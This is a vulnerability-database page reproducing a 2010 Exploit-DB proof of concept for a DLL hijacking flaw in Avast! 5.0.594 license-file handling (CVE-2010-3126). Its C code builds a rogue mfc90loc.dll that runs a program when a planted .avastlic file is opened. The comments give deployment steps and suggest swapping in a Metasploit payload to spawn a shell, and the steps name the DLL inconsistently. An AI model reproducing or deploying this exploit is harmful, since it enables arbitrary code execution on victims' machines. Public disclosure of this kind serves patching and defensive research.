Lucene search
+L

Avast! 5.0.594 - 'mfc90loc.dll' License Files DLL Hijacking

🗓️ 25 Aug 2010 00:00:00Reported by diwrType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 22 Views

Avast 5.0.594 - 'mfc90loc.dll' License Files DLL Hijackin

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2010-3126
26 Aug 201018:00
cve
cvelist
Cvelist
CVE-2010-3126
26 Aug 201018:00
cvelist
euvd
EUVD
EUVD-2010-3126
7 Oct 202500:30
euvd
kaspersky
Kaspersky
KLA10413 ACE vulnerability in Avast! Free Antivirus
26 Aug 201000:00
kaspersky
nvd
NVD
CVE-2010-3126
26 Aug 201018:36
nvd
openvas
OpenVAS
Avast Antivirus File Opening Insecure Library Loading Vulnerability - Windows
1 Sep 201000:00
openvas
openvas
OpenVAS
Avast! Antivirus File Opening Insecure Library Loading Vulnerability (Windows)
1 Sep 201000:00
openvas
prion
Prion
Design/Logic Flaw
26 Aug 201018:36
prion
/*
# Exploit Title: avast! license files DLL Hijacking Exploit (mfc90loc.dll)
# Date: 25/08/2010
# Author: Bruno Filipe (diwr) http://digitalacropolis.us
# Software Link: http://www.avast.com
# Version: <= 5.0.594
# Tested on: WinXP SP2, WinXP SP3
# Thx TheLeader ;)
#
----------------------------------------------------------------------------------------------------------
# This should work with avast license files (.avastlic)
# 1. gcc dllmain.c -o mfc90loc.dll
# 2. Put mfc90ptb.dll in the same directory of an avast license file (EG:
anything.avastlic)
# 3. You can generate a msfpayload DLL and spawn a shell, for example.
#
----------------------------------------------------------------------------------------------------------
*/

#include <windows.h>

int main()
{
  WinExec("calc", SW_NORMAL);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  main();
  return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Mar 2019 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 29.3
EPSS0.07826
22